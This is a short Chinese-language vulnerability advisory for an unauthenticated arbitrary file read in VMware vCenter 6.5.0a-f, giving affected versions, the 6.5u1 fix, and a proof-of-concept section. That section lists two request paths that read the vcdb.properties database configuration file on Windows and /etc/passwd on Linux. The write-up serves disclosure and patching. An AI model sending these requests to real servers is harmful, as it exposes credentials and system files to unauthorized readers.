VMware vCenter任意文件读取漏洞

VMware vCenter任意文件读取漏洞

一、漏洞描述

VMware vCenter 服务器是一种高级服务器管理软件，提供一个用于控制 VMware vSphere 环境的集中式平台，帮助用户获取集中式可见性、简单高效的规模化管理，从而在整个混合云中自动部署和交付虚拟基础架构。

VMware vCenter特定版本存在任意文件读取漏洞。未经身份验证的攻击者可通过向目标系统发送特制请求包来利用此漏洞，成功利用此漏洞的远程攻击者可在目标系统读取任意文件。

二、漏洞影响版本

已知影响版本 VMware vCenter 6.5.0a-f

安全版本 VMware vCenter 6.5u1

三、漏洞复现

poc:

#windows
/eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties
#linux
/eam/vib?id=/etc/passwd

四、漏洞修复

升级至6.5u1修复版本。

 

-----------------------------------------------------------------------------------------------------------

参考:https://www.jianshu.com/p/cdcec329be28